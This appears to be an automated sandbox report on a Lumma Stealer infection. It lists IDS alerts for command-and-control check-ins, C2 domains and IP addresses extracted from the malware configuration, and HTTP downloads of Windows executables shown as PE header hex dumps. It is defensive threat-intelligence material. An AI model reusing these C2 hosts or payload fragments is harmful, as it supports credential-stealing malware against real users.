Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50014 -> 104.21.67.123:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49991 -> 104.21.67.123:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49983 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49991 -> 104.21.67.123:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:50005 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49993 -> 104.21.67.123:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49981 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49981 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: circujitstorm.bet
Source: Malware configuration extractor	URLs: hardswarehub.today
Source: Malware configuration extractor	URLs: tracnquilforest.life
Source: Malware configuration extractor	URLs: hardrwarehaven.run
Source: Malware configuration extractor	URLs: seizedsentec.online
Source: Malware configuration extractor	URLs: codxefusion.top
Source: Malware configuration extractor	URLs: quietswtreams.life
Source: Malware configuration extractor	URLs: starrynsightsky.icu
Source: Malware configuration extractor	URLs: 178.250.188.144
Source: Malware configuration extractor	IPs: 176.113.115.6

Source: global traffic

TCP traffic: 192.168.2.7:50013 -> 178.250.188.144:22635

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Mar 2025 08:56:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 04 Mar 2025 08:16:09 GMTETag: "1d0000-62f7fe29b7eae"Accept-Ranges: bytesContent-Length: 1900544Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c2 01 00 00 00 00 00 00 90 4b 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4b 00 00 04 00 00 3d c4 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 76 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 76 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 73 71 72 76 6b 6b 6c 00 f0 19 00 00 90 31 00 00 ec 19 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 68 66 6d 67 79 6f 6e 00 10 00 00 00 80 4b 00 00 04 00 00 00 da 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4b 00 00 22 00 00 00 de 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Mar 2025 08:57:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 04 Mar 2025 02:27:51 GMTETag: "2db800-62f7b04f657c0"Accept-Ranges: bytesContent-Length: 2996224Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 c9 c0 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 f0 04 00 00 b2 00 00 00 00 00 00 00 e0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 31 00 00 04 00 00 3e 43 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 20 06 00 6b 00 00 00 00 10 06 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 21 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 00 06 00 00 10 00 00 00 e4 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 10 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 20 06 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 6d 74 67 62 6a 6a 7a 00 a0 2a 00 00 30 06 00 00 9a 2a 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6d 6c 69 63 6f 76 71 00 10 00 00 00 d0 30 00 00 04 00 00 00 92 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 30 00 00 22 00 00 00 96 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Mar 2025 08:57:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 03 Mar 2025 00:06:41 GMTETag: "710105-62f64ee4e75af"Accept-Ranges: bytesContent-Length: 7405829Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e7 f5 f5 90 a3 94 9b c3 a3 94 9b c3 a3 94 9b c3 d1 15 9e c2 14 94 9b c3 d1 15 9f c2 af 94 9b c3 d1 15 98 c2 ab 94 9b c3 b2 12 66 c3 a0 94 9b c3 b2 12 98 c2 aa 94 9b c3 b2 12 9f c2 b2 94 9b c3 b2 12 9e c2 8b 94 9b c3 d1 15 9a c2 a8 94 9b c3 a3 94 9a c3 3d 94 9b c3 27 12 9f c2 ba 94 9b c3 27 12 99 c2 a2 94 9b c3 52 69 63 68 a3 94 9b c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 45 f0 c4 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 2a 00 a6 02 00 00 24 02 00 00 00 00 00 20 ce 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 19 f0 71 00 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 dd 03 00 78 00 00 00 00 90 04 00 24 b8 00 00 00 50 04 00 8c 22 00 00 00 00 00 00 00 00 00 00 00 50 05 00 64 07 00 00 e0 b1 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 b0 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 c0 02 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 a4 02 00 00 10 00 00 00 a6 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 38 2d 01 00 00 c0 02 00 00 2e 01 00 00 aa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 50 53 00 00 00 f0 03 00 00 0e 00 00 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 8c 22 00 00 00 50 04 00 00 24 00 00 00 e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 66 70 74 61 62 6c 65 00 01 00 00 00 80 04 00 00 02 00 00 00 0a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 24 b8 00 00 00 90 04 00 00 ba 00 00 00 0c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 64 07 00 00 00 50 05 00 00 08 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Mar 2025 08:57:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 04 Mar 2025 07:16:01 GMTETag: "79ae00-62f7f0b8a8465"Accept-Ranges: bytesContent-Length: 7974400Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 37 e8 fa e3 73 89 94 b0 73 89 94 b0 73 89 94 b0 62 0f 97 b1 72 89 94 b0 38 f1 95 b1 76 89 94 b0 73 89 95 b0 6f 89 94 b0 8b 0e 91 b1 72 89 94 b0 8b 0e 6b b0 72 89 94 b0 8b 0e 96 b1 72 89 94 b0 52 69 63 68 73 89 94 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 af 10 c5 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2b 00 de 76 00 00 cc 02 00 00 00 00 00 c0 14 00 00 00 10 00 00 00 f0 76 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 79 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 f2 76 00 3c 00 00 00 00 10 77 00 b0 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 79 00 bc 0c 00 00 b8 f0 76 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 76 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2b dd 76 00 00 10 00 00 00 de 76 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d6 04 00 00 00 f0 76 00 00 06 00 00 00 e2 76 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 50 00 00 00 00 00 77 00 00 02 00 00 00 e8 76 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 b4 02 00 00 10 77 00 00 b6 02 00 00 ea 76 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 0c 00 00 00 d0 79 00 00 0e 00 00 00 a0 79 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Mar 2025 08:58:04 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 03 Mar 2025 08:27:51 GMTETag: "5a400-62f6beea209d2"Accept-Ranges: bytesContent-Length: 369664Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 c4 af c0 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 f4 04 00 00 ac 00 00 00 00 00 00 b0 ba 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 59 2c 05 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 06 00 d0 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 2d 05 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b1 f2 04 00 00 10 00 00 00 f4 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 07 21 00 00 00 10 05 00 00 22 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 10 d1 00 00 00 40 05 00 00 50 00 00 00 1a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d0 39 00 00 00 20 06 00 00 3a 00 00 00 6a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Mar 2025 08:58:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 03 Mar 2025 14:33:20 GMTETag: "1534f8-62f7109b2de72"Accept-Ranges: bytesContent-Length: 1389816Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 78 82 c5 67 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 27 00 e2 0f 00 00 76 14 00 00 0e 00 00 b0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 15 00 00 04 00 00 68 86 14 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 13 00 08 12 00 00 00 90 13 00 a8 40 01 00 00 60 11 00 0c ab 00 00 00 7a 14 00 f8 ba 00 00 00 e0 14 00 e8 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 96 10 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 54 13 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 e1 0f 00 00 10 00 00 00 e2 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 b0 2f 00 00 00 00 10 00 00 30 00 00 00 e6 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 20 21 01 00 00 30 10 00 00 22 01 00 00 16 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 0c ab 00 00 00 60 11 00 00 ac 00 00 00 38 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 24 24 01 00 00 10 12 00 00 26 01 00 00 e4 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 10 0d 00 00 00 40 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 08 12 00 00 00 50 13 00 00 14 00 00 00 0a 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 60 00 00 00 00 70 13 00 00 02 00 00 00 1e 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 80 13 00 00 02 00 00 00 20 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 40 01 00 00 90 13 00 00 42 01 00 00 22 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e8 15 00 00 00 e0 14 00 00 16 00 00 00 64 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Mar 2025 08:58:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 03 Mar 2025 15:26:11 GMTETag: "45400-62f71c6aa25ae"Accept-Ranges: bytesContent-Length: 283648Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 35 dd 0f b0 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 46 01 00 00 08 00 00 00 00 00 00 8e 65 01 00 00 20 00 00 00 80 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 04 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 65 01 00 4b 00 00 00 00 80 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 0c 00 00 00 f8 64 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 45 01 00 00 20 00 00 00 46 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 80 01 00 00 06 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 43 53 53 00 00 00 00 00 02 03 00 00 c0 01 00 00 02 03 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 